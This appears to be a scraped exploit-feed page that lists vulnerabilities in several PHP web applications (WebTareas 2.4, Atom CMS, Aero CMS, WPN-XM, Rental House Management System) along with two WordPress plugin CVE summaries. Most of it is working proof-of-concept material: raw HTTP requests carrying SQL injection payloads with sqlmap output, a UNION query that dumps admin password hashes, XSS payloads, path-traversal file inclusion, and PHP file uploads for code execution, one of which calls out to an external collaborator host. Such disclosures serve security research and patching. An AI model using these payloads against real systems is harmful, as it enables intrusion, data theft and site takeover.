The WP Dark Mode WordPress plugin before 4.0.8 does not properly sanitize the style parameter in shortcodes before using it to load a PHP template. This leads to Local File Inclusion on servers where non-existent directories may be traversed, or when chained with another vulnerability allowing arbitrary directory creation.

CVE-2023-0467

The directory-pro WordPress plugin before 1.9.5, final-user-wp-frontend-user-profiles WordPress plugin before 1.2.2, producer-retailer WordPress plugin through TODO, photographer-directory WordPress plugin before 1.0.9, real-estate-pro WordPress plugin before 1.7.1, institutions-directory WordPress plugin before 1.3.1, lawyer-directory WordPress plugin before 1.2.9, doctor-listing WordPress plugin before 1.3.6, Hotel Listing WordPress plugin before 1.3.7, fitness-trainer WordPress plugin before 1.4.1, wp-membership WordPress plugin before 1.5.7, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable.

CVE-2020-36666

WebTareas version 2.4 suffers from a remote blind SQL injection vulnerability. Original discovery of this issue in this version is attributed to Behrad Taher in May of 2022. Related CVE number: CVE-2021-43481.

    # Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) # Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example -----------------------------------------------------------------------------------------------------------------------Param: webTareasSID in cookie-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:50 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:39 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 355Connection: closeContent-Type: text/html; charset=UTF-8You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /><b>Warning</b>:  Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />-----------------------------------------------------------------------------------------------------------------------SQLMap:-----------------------------------------------------------------------------------------------------------------------sqlmap resumed the following injection point(s) from stored session:---Parameter: Cookie #1* ((custom) HEADER)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1    [11:49:03] [INFO] testing MySQL  [11:49:03] [INFO] confirming MySQL  do you want to URL encode cookie values (implementation specific)? [Y/n] Y  [11:49:03] [INFO] the back-end DBMS is MySQL  web application technology: PHP 7.4.30, Apache 2.4.54  back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)  [11:49:03] [INFO] fetching database names  [11:49:04] [INFO] starting 6 threads  [11:49:06] [INFO] retrieved: 'zxcv'  [11:49:06] [INFO] retrieved: 'information_schema'  [11:49:06] [INFO] retrieved: 'performance_schema'  [11:49:06] [INFO] retrieved: 'test'  [11:49:06] [INFO] retrieved: 'phpmyadmin'  [11:49:06] [INFO] retrieved: 'mysql'  available databases [6]:  [*] information_schema  [*] mysql  [*] performance_schema  [*] phpmyadmin  [*] test  [*] zxcv  [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'  [11:49:06] [WARNING] your sqlmap version is outdated  [*] ending @ 11:49:06 /2022-10-15/

WebTareas 2.4 SQL Injection

WebTareas version 2.4 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Proof Of Concept -----------------------------------------------------------------------------------------------------------------------Param: searchtype-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateOrigin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/webtareas/general/search.php?searchtype=simpleCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 07:46:31 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 11147[...]<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">[...]-----------------------------------------------------------------------------------------------------------------------Other vulnerable url and params:-----------------------------------------------------------------------------------------------------------------------/webtareas/administration/print_layout.php [doc_type]/webtareas/general/login.php [logout]/webtareas/general/login.php [session]/webtareas/general/newnotifications.php [msg]/webtareas/general/search.php [searchtype]/webtareas/administration/print_layout.php [doc_type]

WebTareas 2.4 Cross Site Scripting

WebTareas version 2.4 suffers from a remote shell upload vulnerability.

    # Exploit Title: WebTareas 2.4 - RCE (Authorized)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example in forum -> members forum -> chat-----------------------------------------------------------------------------------------------------------------------Param: chatPhotos0-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /webtareas/includes/chattab_serv.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: */*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126Content-Length: 6852Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="action"sendPhotos-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatTo"2-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatType"P-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"Content-Type: image/pngPNG[...]<?php phpinfo();?>[...]-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:27:41 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 661Connection: closeContent-Type: application/json{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}-----------------------------------------------------------------------------------------------------------------------See link: /files\/Messages\/7.php-----------------------------------------------------------------------------------------------------------------------Req:-----------------------------------------------------------------------------------------------------------------------GET /webtareas/files/Messages/7.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: image/avif,image/webp,*/*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:28:16 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 89945[...]<title>PHP 7.4.30 - phpinfo()</title>[...]<h1 class="p">PHP Version 7.4.30</h1></td></tr></table><table><tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr><tr><td class="e">Build Date </td><td class="v">Jun  7 2022 16:22:15 </td></tr><tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 [...]

WebTareas 2.4 Remote Shell Upload

Rental House Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Rental House Management System - Reflected Cross-Site Scripting (XSS)# Date: 25/03/2023# Exploit Author: İsmail Can Durna# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/sites/default/files/download/admin/rental_house_management_system.zip# Version: 1# Tested on: Windows/Linux# Proof of Concept:# 1- Rental House Management System# 2- Go to http://localhost/rental_house/rental_house/login.php# 3- Add payload to the URL, the XSS Payload:/"><script>alert('XSS')</script>Url encoded: /%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E# 4- XSS has been triggered.# Go to this url "http://localhost/rental_house/rental_house/login.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E"XSS will trigger.

Rental House Management System 1.0 Cross Site Scripting

WPN-XM Serverstack for Windows version 0.8.6 suffers from cross site scripting, local file inclusion, and path traversal vulnerabilities.

# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-13  
# Vendor Homepage: http://wpn-xm.org/  
# Software Link : https://github.com/WPN-XM/WPN-XM/  
# Tested Version: 0.8.6  
# Tested on:  Windows 10 using XAMPP

# Vulnerability Type: Local File Inclusion (LFI) & directory traversal  
(path traversal)

CVSS v3: 7.5  
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-829, CWE-22

    Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows  
unauthenticated directory traversal and Local File Inclusion through the  
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello  
(without php) GET request.

Proof of concept:

To detect: http://localhost/tools/webinterface/index.php?page=)

The parameter "page" can be modified and load a php file in the server.

Example, In C:\:hello.php with this content:

C:\>type hello.php  
<?php  
echo "HELLO FROM C:\\hello.php";  
?>

To Get hello.php in c:\ :  
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello

Note: hello without ".php".

And you can see the PHP message into the browser at the start.

Response:

HELLO FROM C:\hello.php<!DOCTYPE html>  
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">  
<head>  
    <meta charset="utf-8" />  
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>WP?-XM Server Stack for Windows - 0.8.6</title>  
    <meta name="description" content="WP?-XM Server Stack for Windows -  
Webinterface.">  
    <meta name="author" content="Jens-André Koch" />  
    <link rel="shortcut icon" href="favicon.ico" />

# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not  
sufficiently encode user-controlled inputs, resulting in a reflected  
Cross-Site Scripting (XSS) vulnerability via the  
/tools/webinterface/index.php, in multiple parameters.

Proof of concept:

http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help  
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help  
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E

WPN-XM Serverstack For Windows 0.8.6 XSS / LFI / Traversal

Atom CMS version 2.0 suffers from a remote SQL injection vulnerability. Original discovery of this issue in this version is attributed to Luca Cuzzolin in February of 2022.

    # Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS# Software Link: https://github.com/thedigicraft/Atom.CMS# Version: 2.0# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example-----------------------------------------------------------------------------------------------------------------------Param: id-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 93Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1--------------------------------------------------------------------------------------------------------------------- --Response wait 10 sec-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/Atom.CMS-master/admin/index.php [email]/Atom.CMS-master/admin/index.php [id]/Atom.CMS-master/admin/index.php [slug]/Atom.CMS-master/admin/index.php [status]/Atom.CMS-master/admin/index.php [user]

Atom CMS 2.0 SQL Injection

Aero CMS version 0.l0.1 remote shell upload exploit. Original discovery of this issue in this version is attributed to D4rkP0w4r in April of 2022.

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)  
# Date: 15/10/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS  
# Software Link: https://github.com/MegaTKC/AeroCMS  
# Version: 0.0.1  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example   
-----------------------------------------------------------------------------------------------------------------------  
Param: image content uploading image  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116  
Content-Length: 1156  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post  
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_category_id"

1  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_user"

admin  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_status"

draft  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"  
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_tags"

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="create_post"

Publish Post  
-----------------------------369779619541997471051134453116--

-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------

The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

Aero CMS 0.0.1 Remote Shell Upload

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Tag

#php